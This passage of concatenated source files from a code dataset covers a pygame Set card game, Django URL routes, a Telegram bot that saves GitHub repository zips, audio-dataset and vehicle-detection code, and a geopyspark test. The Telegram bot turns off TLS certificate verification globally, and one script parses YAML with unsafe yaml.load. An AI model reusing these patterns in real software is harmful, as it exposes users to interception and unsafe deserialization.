display_players(surface)\n display_score_multi(surface, player1_score, player2_score)\n\n upper_left_x = 40 #plus 230 each time\n upper_left_y = 30 #plus 149 every 3 cards\n\n current_card = 0\n\n cards_to_display_list = list(displayed_cards.keys())\n for i in range(4):\n upper_left_x = 40\n for j in range(3):\n current_rect = surface.blit(cards_to_display_list[current_card].image, (upper_left_x, upper_left_y))\n displayed_cards[cards_to_display_list[current_card]] = current_rect\n\n upper_left_x += 230\n current_card += 1\n upper_left_y += 149\n\n display_deck_size(surface, deck_size)\n display_no_set_button(surface)\n display_get_hint_button(surface)\n return displayed_cards\n\ndef display_cards_later(displayed_cards, image_list, surface, total_score, deck_size, single_player, player1_score, player2_score):\n '''displays the cards after the initial time'''\n if(single_player):\n pygame.display.set_mode((700, 750))\n display_score_single(surface, total_score)\n else:\n pygame.display.set_mode((1000, 750))\n display_players(surface)\n display_score_multi(surface, player1_score, player2_score)\n\n for k,v in displayed_cards.items():\n current_rect = surface.blit(k.image, v)\n\n display_deck_size(surface, deck_size)\n display_no_set_button(surface)\n display_get_hint_button(surface)\n return displayed_cards\n\ndef get_rect_of_card(card, 
displayed_cards):\n '''returns the rect of the clicked card in the displayed_cards list'''\n rect = displayed_cards[card]\n return rect\n\ndef print_set(displayed_cards):\n '''prints a set solution'''\n set = model.find_a_set(displayed_cards)\n if(set == []):\n print(\"set is empty\")\n else:\n for card in set:\n print(\"card in set: \", card, \"\\n\")\n\ndef display_score_single(surface, total_score):\n '''displays the score for singleplayer'''\n font = pygame.font.Font(None, 50)\n #print(\"FONTS ARE: \", pygame.font.get_fonts())\n\n to_print = \"score: \" + str(total_score)\n text = font.render(to_print, True, [255, 255, 255])\n text_rect = text.get_rect(center =(350, 650))\n surface.blit(text, text_rect)\n\ndef display_score_multi(surface, player1_score, player2_score):\n '''displays the score for multiplayer'''\n font = pygame.font.Font(None, 50)\n\n to_print1 = \"player 1 score: \" + str(player1_score)\n text = font.render(to_print1, True, [255, 255, 255])\n text_rect = text.get_rect(center =(840, 345))\n surface.blit(text, text_rect)\n\n to_print2 = \"player 2 score: \" + str(player2_score)\n text = font.render(to_print2, True, [255, 255, 255])\n text_rect = text.get_rect(center =(840, 545))\n surface.blit(text, text_rect)\n\ndef display_deck_size(surface, deck_size):\n '''displays the size of the deck'''\n font = pygame.font.Font(None, 50)\n to_print = \"cards left in deck: \" + str(deck_size)\n text = font.render(to_print, True, [255, 255, 255])\n text_rect = text.get_rect(center = (350, 723))\n surface.blit(text, text_rect)\n\ndef display_end_score_single(surface, total_score):\n '''displays the score at the end of the game for singleplayer'''\n font = pygame.font.Font(None, 100)\n to_print = \"score: \" + str(total_score)\n text = font.render(to_print, True, [0, 0, 250])\n text_rect = text.get_rect(center =(350, 500))\n surface.blit(text, text_rect)\n\ndef display_end_score_multi(surface, player1_score, player2_score):\n '''displays the score at the end of the game for multiplayer'''\n font = pygame.font.Font(None, 80)\n to_print = \"P1 score: \" + str(player1_score)\n to_print += \" P2 score: \" + str(player2_score)\n text = font.render(to_print, True, [0, 0, 250])\n text_rect = text.get_rect(center =(500, 600))\n surface.blit(text, text_rect)\n\ndef display_end_game_single(surface, total_score):\n '''handles the end of the game display for singleplayer'''\n pygame.display.set_mode((700, 750))\n game_over_rect = pygame.Rect(150,150,350,350)\n surface.blit(pygame.image.load('/Users/adifaintuch/Desktop/set/src/gameover_single.png'), game_over_rect)\n display_end_score_single(surface,total_score)\n\ndef display_end_game_multi(surface, player1_score, player2_score, winner):\n '''handles the end of the game display for multiplayer'''\n pygame.display.set_mode((1000, 750))\n game_over_rect = pygame.Rect(240,35,350,350)\n surface.blit(pygame.image.load('/Users/adifaintuch/Desktop/set/src/gameover_multi.png'), game_over_rect)\n if(winner == 'player1'):\n player1win_rect = pygame.Rect(120,400,1310,152)\n surface.blit(pygame.image.load('/Users/adifaintuch/Desktop/set/src/player1win.png'), player1win_rect)\n elif(winner == 'player2'):\n player2win_rect = pygame.Rect(120,400,1310,152)\n surface.blit(pygame.image.load('/Users/adifaintuch/Desktop/set/src/player2win.png'), player2win_rect)\n else:\n tie_rect = pygame.Rect(120,400,1310,152)\n surface.blit(pygame.image.load('/Users/adifaintuch/Desktop/set/src/tie.png'), tie_rect)\n display_end_score_multi(surface, player1_score, 
player2_score)\n\ndef display_no_set_button(surface):\n no_set_rect = pygame.Rect(30,600,5,5)\n no_set_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/noset.png')\n surface.blit(no_set_image, no_set_rect)\n\ndef display_get_hint_button(surface):\n get_hint_rect = pygame.Rect(430,600,5,5)\n get_hint_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/gethint.png')\n surface.blit(get_hint_image, get_hint_rect)\n\ndef create_displayed_cards(initial_cards):\n '''creates the initial 12 cards for display_cards'''\n displayed_cards_return = defaultdict()\n for card in initial_cards:\n displayed_cards_return[card] = pygame.Rect(0,0,0,0)\n return displayed_cards_return\n\ndef reset_board(surface, deck, displayed_cards, image_list, total_score, player1_score, player2_score, single_player):\n '''resets the board when there is no set and player clicks 'no set' '''\n model.add_cards_back_to_deck(deck, displayed_cards)\n shuffle(deck)\n initial_cards = model.create_initial_twelve_cards(deck)\n displayed_cards = create_displayed_cards(initial_cards)\n model.remove_used_cards_from_deck(deck, displayed_cards.keys())\n clicked_images = defaultdict()\n displayed_cards_return = display_cards_initial(displayed_cards, image_list, surface, total_score, len(deck), single_player, player1_score, player2_score)\n return displayed_cards_return\n\ndef click_card_in_set(surface, image_list, displayed_cards, solution_set, clicked_images):\n '''clicks on a card in the solution set when user clicks on 'get hint' button'''\n for k,v in displayed_cards.items():\n if (k in solution_set and k not in clicked_images):\n clicked_images[k] = v\n make_image_clicked(k, v, surface, image_list, displayed_cards)\n break\n\ndef make_player_selection_screen(surface):\n '''makes the initial screen where the user can select single or multi player'''\n pygame.display.set_mode((700, 750))\n single_player_rect = pygame.Rect(150,200,5,5)\n single_player_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/singleplayer.png')\n #no_set_image = pygame.transform.scale(no_set_image, (240, 58))\n surface.blit(single_player_image, single_player_rect)\n\n multi_player_rect = pygame.Rect(150,400,5,5)\n multi_player_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/multiplayer.png')\n #get_hint_image = pygame.transform.scale(get_hint_image, (240, 50))\n surface.blit(multi_player_image, multi_player_rect)\n\ndef display_player1(surface):\n '''displays player 1'''\n player1_rect = pygame.Rect(675,200,316,98)\n player1_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/player1.png')\n surface.blit(player1_image, player1_rect)\n\ndef display_player2(surface):\n '''displays player 2'''\n player2_rect = pygame.Rect(675,400,316,98)\n player2_image = pygame.image.load('/Users/adifaintuch/Desktop/set/src/player2.png')\n surface.blit(player2_image, player2_rect)\n\ndef display_players(surface):\n '''displays players 1 and 2 and their scores'''\n display_player1(surface)\n display_player2(surface)\n\n\ndef run():\n total_score = 0\n player1_score = 0\n player2_score = 0\n\n winner = 'None'\n\n pygame.init()\n\n list_of_rect = []\n\n for i in range(11):\n rect_to_add = 'rect' + str(i + 1)\n list_of_rect.append(rect_to_add)\n\n initial_surface = pygame.display.set_mode((700, 750))\n\n make_player_selection_screen(initial_surface)\n\n single_player = False\n\n _waiting = True\n while(_waiting):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n _waiting = False\n pygame.quit()\n if event.type 
== pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n single_player_rect = pygame.Rect(150,200,402,98)\n multi_player_rect = pygame.Rect(150,400,402,98)\n if(single_player_rect.collidepoint(pos)):\n single_player = True\n _waiting = False\n elif(multi_player_rect.collidepoint(pos)):\n _waiting = False\n pygame.display.flip()\n\n\n surface = pygame.display.set_mode((700, 750))\n\n if(single_player == False):\n surface = pygame.display.set_mode((1000, 750))\n\n\n running = True\n find_solution_set = True\n\n deck = model.create_deck()\n shuffle(deck)\n\n initial_cards = model.create_initial_twelve_cards(deck)\n displayed_cards = create_displayed_cards(initial_cards)\n model.remove_used_cards_from_deck(deck, displayed_cards.keys())\n\n image_list = []\n\n for i in range(81):\n new_pathname = '/Users/adifaintuch/Desktop/set/src/card' + str(i + 1) + '.png'\n image_list.append(pygame.image.load(new_pathname))\n\n #a defaultdict of key = card and value = rect\n clicked_images = defaultdict()\n\n display_cards_initial(displayed_cards, image_list, surface, total_score, len(deck), single_player, player1_score, player2_score)\n\n clicks = 0\n set_of_removed_cards = set()\n\n solution_set = []\n\n print_solution_set_once = False\n\n player1_clicked = False\n player2_clicked = False\n\n while running:\n for event in pygame.event.get():\n if(find_solution_set):\n solution_set = model.find_a_set(displayed_cards)\n find_solution_set = False\n if(len(deck) == 0 and len(solution_set) == 0):\n if(single_player):\n display_end_game_single(surface, total_score)\n else:\n if(player1_score > player2_score):\n display_end_game_multi(surface, player1_score, player2_score, 'player1')\n elif(player1_score < player2_score):\n display_end_game_multi(surface, player1_score, player2_score, 'player2')\n else:\n display_end_game_multi(surface, player1_score, player2_score, 'tie')\n\n if((not single_player and (player1_clicked == False and player2_clicked == False) or clicks < 3) or (single_player and clicks < 3)):\n if(print_solution_set_once == False):\n print_solution_set_once = True\n print()\n print(\"solution set\")\n print(solution_set)\n print()\n print(\"size of deck\", len(deck))\n if event.type == pygame.QUIT:\n running = False\n pygame.quit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n pos = pygame.mouse.get_pos()\n no_set_rect = pygame.Rect(30,605,240,100)\n get_hint_rect = pygame.Rect(430,605,240,100)\n player1_rect = pygame.Rect(675,200,316,98)\n player2_rect = pygame.Rect(675,400,316,98)\n\n if(no_set_rect.collidepoint(pos) and solution_set == [] and len(deck) > 0):\n displayed_cards = reset_board(surface, deck, displayed_cards, image_list, total_score, player1_score, player2_score, single_player)\n find_solution_set = True\n player1_clicked = False\n player2_clicked = False\n elif(no_set_rect.collidepoint(pos)):\n print(\"====CLICKED NO SET RECT AND THERE IS A SET====\")\n elif(get_hint_rect.collidepoint(pos)):\n if(solution_set != []):\n clicks += 1\n click_card_in_set(surface, image_list, displayed_cards, solution_set, clicked_images)\n\n else:\n clicked_player = False\n if(not single_player):\n if(player1_rect.collidepoint(pos) and not player1_clicked and not player2_clicked):\n player1_clicked = True\n make_player_clicked(675,200,316,98,surface, player1_clicked, player2_clicked)\n clicked_player = True\n elif(player2_rect.collidepoint(pos) and not player2_clicked and not player1_clicked):\n player2_clicked = True\n make_player_clicked(675,400,316,98,surface, player1_clicked, player2_clicked)\n 
clicked_player = True\n elif(player1_rect.collidepoint(pos) and player1_clicked):\n make_player_unclicked(675,200,316,98,surface, player1_clicked, player2_clicked)\n player1_clicked = False\n clicked_player = True\n elif(player2_rect.collidepoint(pos) and player2_clicked):\n make_player_unclicked(675,400,316,98,surface, player1_clicked, player2_clicked)\n player2_clicked = False\n clicked_player = True\n if(clicked_player == False and clicks < 3):\n for key, value in displayed_cards.items():\n if value.collidepoint(pos):\n if(key not in set_of_removed_cards):\n if(key not in clicked_images):\n clicks += 1\n clicked_images[key] = value\n make_image_clicked(key, value, surface, image_list, displayed_cards)\n else:\n clicks -= 1\n make_image_unclicked(key, value, surface, image_list, displayed_cards)\n del clicked_images[key]\n else:\n clicks = 0\n is_a_set = model.check_for_set(clicked_images)\n if(is_a_set):\n print_solution_set_once = False\n print()\n print(\"is a set\")\n print()\n if(single_player):\n total_score += 1\n else:\n if(player1_clicked):\n player1_score += 1\n else:\n player2_score += 1\n list_of_rect = []\n for card in clicked_images:\n list_of_rect.append(get_rect_of_card(card, displayed_cards))\n set_of_removed_cards.add(card)\n displayed_cards.pop(card)\n clicked_images = defaultdict()\n if(len(deck) != 0):\n model.add_three_new_cards(deck, displayed_cards, list_of_rect)\n if(single_player):\n display_cards_later(displayed_cards, image_list, surface, total_score, len(deck), single_player, player1_score, player2_score)\n elif(player1_clicked):\n display_cards_later(displayed_cards, image_list, surface, player1_score, len(deck), single_player, player1_score, player2_score)\n player1_clicked = False\n else:\n display_cards_later(displayed_cards, image_list, surface, player2_score, len(deck), single_player, player1_score, player2_score)\n player2_clicked = False\n find_solution_set = True\n\n else:\n print(\"is not a set\")\n clicked_images = defaultdict()\n display_cards_later(displayed_cards, image_list, surface, total_score, len(deck), single_player, player1_score, player2_score)\n player1_clicked = False\n player2_clicked = False\n\n\n pygame.display.flip()\n\n\n pygame.quit()\n\n\nif __name__ == '__main__':\n\trun()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"479590115","text":"from django.conf.urls import patterns, url, include\nfrom reviews import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^publications/$', views.index, {'show' : ['publications']}, name='index_publications'),\n url(r'^presentations/$', views.index, {'show' : ['presentations']}, name='index_presentations'),\n\n url(r'^my/$', views.index_authored, name='index_my'),\n url(r'^my/publications/$', views.index_authored, {'show' : ['publications']}, name='index_my_publications'),\n url(r'^my/presentations/$', views.index_authored, {'show' : ['presentations']}, name='index_my_presentations'),\n\n url(r'^myreviews/$', views.index_reviewer, name='index_review'),\n url(r'^myreviews/publications/$', views.index_reviewer, {'show' : ['publications']}, name='index_review_publications'),\n url(r'^myreviews/presentations/$', views.index_reviewer, {'show' : ['presentations']}, name='index_review_presentations'),\n\n url(r'^committee/$', views.index_admin, name='index_admin'),\n url(r'^committee/publications/$', views.index_admin, 
{'show' : ['publications']}, name='index_admin_publications'),\n url(r'^committee/presentations/$', views.index_admin, {'show' : ['presentations']}, name='index_admin_presentations'),\n\n url(r'^(?PP\\d+(-v\\d)?)/import/$', views.import_publication, name='import'),\n url(r'^(?PG\\d+(-[v|x]\\d)?)/import/$', views.import_presentation, name='import_presentation'),\n\n url(r'^(?P[P|G]\\d+)/', include(patterns('',\n url(r'^$', views.detail, name='detail'),\n url(r'^edit/$', views.edit, name='edit'),\n url(r'^withdraw/$', views.withdraw, name='withdraw'),\n url(r'^accept/$', views.accept, name='accept'),\n url(r'^approve_abstract/$', views.approve_abstract, name='approve_abstract'),\n url(r'^comment/$', views.comment, name='comment'),\n\n url(r'^draft/(?P\\d+)/', include(patterns('',\n url(r'^$', views.draft, name='draft'),\n url(r'^review/$', views.review, name='review'),\n url(r'^review/(?P\\d+)$', views.review, name='review'),\n url(r'^approve/$', views.approve, name='approve'),\n ))),\n\n ))),\n\n url(r'^journals/add/$', views.add_journal, name='add_journal'),\n )\n","sub_path":"reviews/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"286489783","text":"#!/usr/bin/env python3\n\nimport sys, os, re, datetime, argparse, shutil, yaml, fnmatch, colorama\nfrom colorama import Fore as cf\n\ncolorama.init()\n\nVERSION = \"2.00\"\nDATE = \"2017-02-26\"\n\ndef init():\n print(cf.BLUE + \"This is DeGeŠ-prepare, version \" + cf.MAGENTA + VERSION + cf.BLUE + \" [\" + cf.MAGENTA + DATE + cf.BLUE + \"]\")\n print(cf.BLUE + \"Invoked on file \" + cf.MAGENTA + args.file.name + cf.RESET)\n\ndef abortError(e):\n print(cf.RED + e.strerror + cf.WHITE)\n sys.exit(3)\n\ndef climbUp(level):\n return os.path.abspath(os.path.join(os.path.dirname(rootFile), *(['..'] * level)))\n\ndef metadataFile(level):\n return os.path.abspath(os.path.join(os.path.join(climbUp(level)), 'meta.yaml'))\n\ndef protectedLoad(fileName):\n try:\n return yaml.load(open(fileName, 'r+'))\n except FileNotFoundError as e:\n print(cf.RED + \"File not found: {}\".format(fileName) + cf.WHITE)\n sys.exit(2)\n except yaml.YAMLError as e:\n print(cf.RED + \"Could not parse YAML file {}\".format(fileName) + cf.WHITE)\n sys.exit(3)\n\ndef superstructure(level):\n name = os.path.basename(os.path.normpath(climbUp(level)))\n content = protectedLoad(metadataFile(level))\n return (name, content) \n\ndef processMetadata():\n moduleName, moduleConf = superstructure(3)\n volumeName, volumeConf = superstructure(2)\n semesterName, semesterConf = superstructure(1)\n roundName, roundConf = superstructure(0)\n problems = []\n\n\n for directory in sorted(os.listdir(rootDir)):\n fullName = os.path.join(rootDir, directory)\n if os.path.isdir(fullName):\n problems.append(protectedLoad(os.path.join(fullName, 'meta.yaml')))\n\n print(rootFile)\n print(rootDir)\n print(inputRootDir)\n\ndef bye():\n print(cf.GREEN + \"Everything finished successfully, bye\")\n\n\n\nparser = argparse.ArgumentParser(\n description = \"Prepare and compile a DeGeŠ XeLaTeX template for a single round from repository\",\n)\nparser.add_argument('file', type = argparse.FileType('r'), help = 'round\\'s YAML metadata file')\nargs = parser.parse_args()\n\nrootFile = args.file.name\nrootDir = os.path.dirname(rootFile)\ninputRootDir = re.sub('source/', 'input/', 
os.path.dirname(rootFile))\n\ninit()\nprocessMetadata()\nbye()\n","sub_path":"core/dgs-prepare.py","file_name":"dgs-prepare.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"359129043","text":"# Taken straight from Patter https://github.com/ryanleary/patter\n# TODO: review, and copyright and fix/add comments\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom .manifest import Manifest\n\n\ndef seq_collate_fn(batch):\n def find_max_len(seq, index):\n max_len = -1\n for item in seq:\n if item[index].size(0) > max_len:\n max_len = item[index].size(0)\n return max_len\n\n batch_size = len(batch)\n\n audio_signal, audio_lengths = None, None\n if batch[0][0] is not None:\n max_audio_len = find_max_len(batch, 0)\n\n audio_signal = torch.zeros(batch_size, max_audio_len,\n dtype=torch.float)\n audio_lengths = []\n for i, s in enumerate(batch):\n audio_signal[i].narrow(0, 0, s[0].size(0)).copy_(s[0])\n audio_lengths.append(s[1])\n audio_lengths = torch.tensor(audio_lengths, dtype=torch.long)\n\n max_transcript_len = find_max_len(batch, 2)\n\n transcript = torch.zeros(batch_size, max_transcript_len, dtype=torch.long)\n transcript_lengths = []\n for i, s in enumerate(batch):\n transcript[i].narrow(0, 0, s[2].size(0)).copy_(s[2])\n transcript_lengths.append(s[3])\n transcript_lengths = torch.tensor(transcript_lengths, dtype=torch.long)\n\n return audio_signal, audio_lengths, transcript, transcript_lengths\n\n\ndef audio_seq_collate_fn(batch):\n \"\"\"\n collate a batch (iterable of (sample tensor, label tensor) tuples) into\n properly shaped data tensors\n :param batch:\n :return: inputs (batch_size, num_features, seq_length), targets,\n input_lengths, target_sizes\n \"\"\"\n # sort batch by descending sequence length (for packed sequences later)\n batch.sort(key=lambda x: -x[0].size(0))\n minibatch_size = len(batch)\n\n # init tensors we need to return\n inputs = torch.zeros(minibatch_size, batch[0][0].size(0))\n input_lengths = torch.zeros(minibatch_size, dtype=torch.long)\n target_sizes = torch.zeros(minibatch_size, dtype=torch.long)\n targets = []\n metadata = []\n\n # iterate over minibatch to fill in tensors appropriately\n for i, sample in enumerate(batch):\n input_lengths[i] = sample[0].size(0)\n inputs[i].narrow(0, 0, sample[0].size(0)).copy_(sample[0])\n target_sizes[i] = len(sample[1])\n targets.extend(sample[1])\n metadata.append(sample[2])\n targets = torch.tensor(targets, dtype=torch.long)\n return inputs, targets, input_lengths, target_sizes, metadata\n\n\nclass AudioDataset(Dataset):\n def __init__(self, manifest_filepath, labels, featurizer,\n max_duration=None,\n min_duration=None, max_utts=0, normalize=True,\n trim=False, eos_id=None, logger=False, load_audio=True):\n \"\"\"\n Dataset that loads tensors via a json file containing paths to audio\n files, transcripts, and durations\n (in seconds). Each new line is a different sample. Example below:\n\n {\"audio_filepath\": \"/path/to/audio.wav\", \"text_filepath\":\n \"/path/to/audio.txt\", \"duration\": 23.147}\n ...\n {\"audio_filepath\": \"/path/to/audio.wav\", \"text\": \"the\n transcription\", offset\": 301.75, \"duration\": 0.82, \"utt\":\n \"utterance_id\",\n \"ctm_utt\": \"en_4156\", \"side\": \"A\"}\n\n Args:\n manifest_filepath: Path to manifest json as described above. 
Can\n be coma-separated paths.\n labels: String containing all the possible characters to map to\n featurizer: Initialized featurizer class that converts paths of\n audio to feature tensors\n max_duration: If audio exceeds this length, do not include in\n dataset\n min_duration: If audio is less than this length, do not include\n in dataset\n max_utts: Limit number of utterances\n normalize: whether to normalize transcript text (default): True\n eos_id: Id of end of sequence symbol to append if not None\n load_audio: Boolean flag indicate whether do or not load audio\n \"\"\"\n m_paths = manifest_filepath.split(',')\n self.manifest = Manifest(m_paths, labels,\n max_duration=max_duration,\n min_duration=min_duration, max_utts=max_utts,\n normalize=normalize)\n self.featurizer = featurizer\n self.trim = trim\n self.eos_id = eos_id\n self.load_audio = load_audio\n if logger:\n logger.info(\n \"Dataset loaded with {0:.2f} hours. Filtered {1:.2f} \"\n \"hours.\".format(\n self.manifest.duration / 3600,\n self.manifest.filtered_duration / 3600))\n\n def __getitem__(self, index):\n sample = self.manifest[index]\n if self.load_audio:\n duration = sample['duration'] if 'duration' in sample else 0\n offset = sample['offset'] if 'offset' in sample else 0\n features = self.featurizer.process(sample['audio_filepath'],\n offset=offset,\n duration=duration,\n trim=self.trim)\n f, fl = features, torch.tensor(features.shape[0]).long()\n # f = f / (torch.max(torch.abs(f)) + 1e-5)\n else:\n f, fl = None, None\n\n t, tl = sample[\"transcript\"], len(sample[\"transcript\"])\n if self.eos_id is not None:\n t = t + [self.eos_id]\n tl += 1\n\n return \\\n f, fl, \\\n torch.tensor(t).long(), torch.tensor(tl).long()\n\n def __len__(self):\n return len(self.manifest)\n","sub_path":"collections/nemo_asr/nemo_asr/parts/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"595222458","text":"import cv2\nimport numpy as np\nimport classification\nfrom classification import Classifier\nfrom scipy.ndimage.measurements import label, find_objects\nfrom tqdm import tqdm\nimport utils\n\nWINDOW_SIZES = [ 30, 40, 60, 90, 120, 180 ]\nHORIZON_LINE = 440\n\nclass Pipeline:\n\n def __init__(self):\n self.classifier = classification.load()\n self.heatMap = np.zeros((720, 1280), dtype=np.float32)\n\n def sliding_windows():\n for windowSize in WINDOW_SIZES:\n columnShift = windowSize // 4\n columnNum = (1280 - windowSize) // columnShift + 1\n rowShift = windowSize // 4\n for column in range(columnNum):\n for row in range(-1, 2):\n top = HORIZON_LINE - windowSize // 3 - row * rowShift\n bottom = top + windowSize\n left = column * columnShift\n right = left + windowSize\n windowMask = np.ix_(\n range(top, bottom),\n range(left, right))\n yield windowMask\n\n def update_heat_map(self, image):\n self.heatMap *= 0.9\n for windowMask in Pipeline.sliding_windows():\n windowImage = image[windowMask]\n windowImage = cv2.resize(windowImage, (64, 64))\n prediction = self.classifier.predict(windowImage)\n if prediction > 0.1:\n self.heatMap[windowMask] += (0.01 * prediction)\n self.heatMap = np.clip(self.heatMap, 0.0, 1.0)\n\n def process(self, image):\n self.update_heat_map(image)\n\n heatMap = np.uint8(self.heatMap * 255.0)\n heatMap[heatMap < 25] = 0\n labelMap, labels = label(heatMap)\n\n for labeledArea in Pipeline.find_objects(labelMap):\n boundingBox = ObjectBoundingBox(labeledArea)\n cv2.rectangle(image,\n 
pt1=(boundingBox.left, boundingBox.top),\n pt2=(boundingBox.right, boundingBox.bottom),\n color=(255, 0, 0),\n thickness=3)\n\n return image\n\n def find_objects(labelMap):\n objects = find_objects(labelMap)\n objects = Pipeline.filter_tall_objects(objects)\n return objects\n\n def filter_tall_objects(objects):\n for obj in objects:\n boundingBox = ObjectBoundingBox(obj)\n width = boundingBox.right - boundingBox.left\n height = boundingBox.bottom - boundingBox.top\n if width / height > 0.5:\n yield obj\n\nclass ObjectBoundingBox:\n\n def __init__(self, obj):\n self.top = obj[0].start\n self.bottom = obj[0].stop\n self.left = obj[1].start\n self.right = obj[1].stop\n\nif __name__ == \"__main__\":\n\n pipeline = Pipeline()\n\n inputFileName = \"project_video.mp4\"\n outputFileName = \"output.avi\"\n\n inputVideo = utils.VideoClip(inputFileName)\n\n fourcc = cv2.VideoWriter_fourcc(*\"XVID\")\n outputVideo = cv2.VideoWriter(outputFileName, fourcc, 25, (1280, 720))\n\n for frame in inputVideo.frames():\n image = pipeline.process(frame)\n outputVideo.write(image)\n\n outputVideo.release()\n","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"118000447","text":"import time,sys,telebot,wget,ssl,os\n\n#Fix for CERTIFICATE_VERIFY_FAILED\nssl._create_default_https_context = ssl._create_unverified_context\n\nbot = telebot.TeleBot('token')\nuser_id = 123456789\n\n\ndef create_dir(path):\n\ttry:\n\t\tos.mkdir(path)\n\texcept OSError:\n\t\tpass\n\ndef remove_file(path):\n\ttry:\n\t\tos.remove(path)\n\texcept OSError:\n\t\tpass\n\ndef github_download(message):\n\tgithub_url=message.text.split('/')\n\tfor gh in enumerate(github_url):\n\t\tif(gh[1]=='github.com'):\n\t\t\tcreate_dir('github')\n\t\t\tgithub_download_url=f\"https://github.com/{github_url[gh[0]+1]}/{github_url[gh[0]+2]}/archive/master.zip\"\n\t\t\tfile_name=f\"github/{github_url[gh[0]+1]}_{github_url[gh[0]+2]}.zip\"\n\t\t\tif(os.path.isfile(file_name)):\n\t\t\t\tremove_file(file_name)\n\t\t\twget.download(github_download_url, file_name)\n\t\t\tbot.delete_message(message.chat.id,message.message_id)\n\t\t\tbreak\n\n\n@bot.message_handler(func=lambda message: True)\ndef echo_all(message):\n\ttry:\n\t\tif(message.from_user.id==user_id):\n\t\t\tif(message.text.find('github.com')>-1):\n\t\t\t\tgithub_download(message)\n\texcept Exception as e:\n\t\tprint(e)\n\t\nwhile True:\n\ttry:\n\t\t#bot.polling(none_stop=True)\n\t\tprint('\\t✅ Working')\n\t\tbot.polling()\n\t\tsys.exit()\n\texcept Exception as e:\n\t\tprint(e)\n\t\tprint('\\t🔄 Restart')","sub_path":"tg_github_saver.py","file_name":"tg_github_saver.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"443350298","text":"from os import walk, path\nimport unittest\nimport rasterio\nimport pytest\n\nfrom geopyspark.geotrellis.constants import SPATIAL\nfrom geopyspark.tests.python_test_utils import geotiff_test_path\nfrom geopyspark.geotrellis.geotiff_rdd import get\nfrom geopyspark.tests.base_test_class import BaseTestClass\n\n\nclass S3GeoTiffIOTest(object):\n def get_filepaths(self, dir_path):\n files = []\n\n for (fd, dn, filenames) in walk(dir_path):\n files.extend(filenames)\n\n return [path.join(dir_path, x) for x in files]\n\n def read_geotiff_rasterio(self, paths, windowed):\n rasterio_tiles = []\n\n windows = [((0, 256), (0, 256)),\n ((256, 512), (0, 
256)),\n ((0, 256), (256, 512)),\n ((256, 512), (256, 512))]\n\n for f in paths:\n with rasterio.open(f) as src:\n if not windowed:\n rasterio_tiles.append({'data': src.read(),\n 'no_data_value': src.nodata})\n else:\n for window in windows:\n rasterio_tiles.append(\n {'data': src.read(window=window),\n 'no_data_value': src.nodata})\n\n return rasterio_tiles\n\n\nclass Multiband(S3GeoTiffIOTest, BaseTestClass):\n mock_wrapper = BaseTestClass.geopysc._jvm.geopyspark.geotrellis.testkit.MockS3ClientWrapper\n client = mock_wrapper.mockClient()\n\n key = \"one-month-tiles-multiband/result.tif\"\n bucket = \"test\"\n\n uri = \"s3://test/one-month-tiles-multiband/result.tif\"\n file_path = geotiff_test_path(key)\n options = {\"s3Client\": \"mock\"}\n\n in_file = open(file_path, \"rb\")\n data = in_file.read()\n in_file.close()\n\n @pytest.fixture(scope='class', autouse=True)\n def tearDown(self):\n yield\n BaseTestClass.geopysc.pysc._gateway.close()\n\n def read_multiband_geotrellis(self, opt=options):\n self.client.putObject(self.bucket, self.key, self.data)\n result = get(BaseTestClass.geopysc,\n SPATIAL,\n self.uri,\n opt)\n\n return [tile[1] for tile in result.to_numpy_rdd().collect()]\n\n def test_whole_tiles(self):\n geotrellis_tiles = self.read_multiband_geotrellis()\n rasterio_tiles = self.read_geotiff_rasterio([self.file_path], False)\n\n for x, y in zip(geotrellis_tiles, rasterio_tiles):\n self.assertTrue((x['data'] == y['data']).all())\n\n def windowed_result_checker(self, windowed_tiles):\n self.assertEqual(len(windowed_tiles), 4)\n\n def test_windowed_tiles(self):\n geotrellis_tiles = self.read_multiband_geotrellis({\"s3Client\": \"mock\", \"maxTileSize\": 256})\n rasterio_tiles = self.read_geotiff_rasterio([self.file_path], True)\n\n self.windowed_result_checker(geotrellis_tiles)\n\n for x, y in zip(geotrellis_tiles, rasterio_tiles):\n self.assertTrue((x['data'] == y['data']).all())\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"geopyspark/tests/s3_geotiff_rdd_test.py","file_name":"s3_geotiff_rdd_test.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"77555927","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport numpy\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport pylab\nimport h5py\n\n\n\ndef trim_axs(axs, N):\n \"\"\"little helper to massage the axs list to have correct length...\"\"\"\n axs = axs.flat\n for ax in axs[N:]:\n ax.remove()\n return axs[:N]\n\n\ndef gen_image(dset, basename, cbar=True, log=False):\n figsize = (numpy.array(dset.shape) / 100.0)[::-1]\n fig = plt.figure()\n fig.set_size_inches(figsize)\n if cbar:\n figsize[1] *= 1.1\n plt.title(basename)\n 